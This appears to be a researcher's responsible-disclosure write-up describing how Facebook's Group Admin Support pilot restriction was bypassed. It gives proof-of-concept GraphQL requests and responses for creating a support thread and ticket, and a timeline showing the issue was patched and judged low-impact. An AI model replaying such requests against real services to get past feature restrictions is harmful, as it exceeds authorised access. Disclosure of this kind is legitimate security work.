@wongmjane
~3 mins

Pilot Into Facebook Group Support

Facebook Group Admin Support is currently under a pilot program.

This feature is currently available to a limited number of group admins on iOS and Android in English and Spanish.

I still managed to use Admin Support without being part of the pilot program.

Impact

I am not supposed to be able to create a Group Admin Support thread and support ticket. But as of now, I am able to created one.

It could unnecessarily increase Facebook Group Team’s workload out of control of the pilot program.

Proof-of-Concept

Preparation

Use an access token created for the Facebook for Android app.

Create a Group Admin Support Thread

This request will only succeed if the viewer (i.e. me) is an admin of the Group.

Server Request:

HTTP POST /graphql
Host: graph.facebook.com

doc_id=REDACTED
variables={
  input: {
    client_mutation_id: 0,
    actor_id: VIEWER_ID,
    group_id: ID_OF_GROUP_WHERE_VIEWER_IS_ADMIN,
    message: 'Imagine being so lonely, one goes so far as to stumble into
    Group Support just to have basic human interactions. Hi, how are you?'
  }
}

Server Response:

{
  "data": {
    "support_thread_create": {
      "thread": {
        "id": "SUPPORT_THREAD_ID",
      }
    }
  }
}

The response returns with the ID of the Group Admin Support Thread we have just created, note it down as SUPPORT_THREAD_ID.

Get a Group Admin Support Facebook Message

Server Request:

HTTP POST /graphql
Host: graph.facebook.com

q=node(SUPPORT_THREAD_ID){support_messages{nodes{__typename, id}}}

Server Response:

{
  "700000000000000": {
    "support_messages": {
      "nodes": [{
          "__typename": "GroupSupportUserMessage",
          "id": "700000000000000"
        },
        {
          "__typename": "GroupSupportFacebookMessage",
          "id": "SUPPORT_FB_MESSAGE_ID"
        }
      ]
    }
  }
}

This response returns with a few Group Admin Support Messages, note down the one created by Facebook whose __typename is “GroupSupportFacebookMessage”, as SUPPORT_FB_MESSAGE_ID.

Submit Group Admin Support Issue Ticket to Facebook Groups Team

Server Request:

HTTP POST /graphql
Host: graph.facebook.com

doc_id=REDACTED
variable={
  input: {
    actor_id: VIEWER_ID,
    client_mutation_id: 1,
    message_id: SUPPORT_FB_MESSAGE_ID,
    issue_description: 'I poured coffee into my laptop and smoke comes out.'
  }
}

Server Response:

{
  "data": {
    "support_issue_submit": {
      "client_mutation_id": "1",
      "thread": {
        "id": "SUPPORT_THREAD_ID",
        "support_messages": {
          "nodes": [{
              "__typename": "GroupSupportUserMessage",
              "id": "700000000000000"
            },
            {
              "__typename": "GroupSupportFacebookMessage",
              "id": "SUPPORT_FB_MESSAGE_ID",
              "support_message": "Okay, we'll do our best to help with this. Finish submitting your issue below and you'll have a chance to add any details that might help us help you.",
              "fb_support_name": "Facebook",
              "profile_picture_url": "<fb logo url>",
              "support_ticket": {
                "time_created": 1000000000,
                "ticket_url": "https://www.facebook.com/support/?item_id=2000000000000000",
                "status_subtitle": "Response Time 24 Hours",
                "support_inbox_data": {
                  "title": "You contacted the Facebook Groups team.",
                  "status": {
                    "title_text": "OPEN",
                    "color": "FF4A90E2"
                  }
                }
              }
            }
          ]
        }
      },
      "issue": {
        "id": "SUPPORT_ISSUE_ID"
      }
    }
  }
}

We can see the new SUPPORT_ISSUE_ID and a support ticket has been created and assigned to the Facebook Groups team.

Since my group or myself is not rolled into this Group Admin Support pilot program, the team must have been confused (and possibly cringed) by this ticket.

Timeline

2018-12-03: Report Submitted

2018-12-04: Further Investigation by Facebook

2018-12-13: Bug Patched by Facebook

2018-12-13: Report Marked as “Informative”, due to:

There doesn’t seem to be much security/privacy impact in bypassing this feature restriction, only potentially creating additional work for employees handling support requests.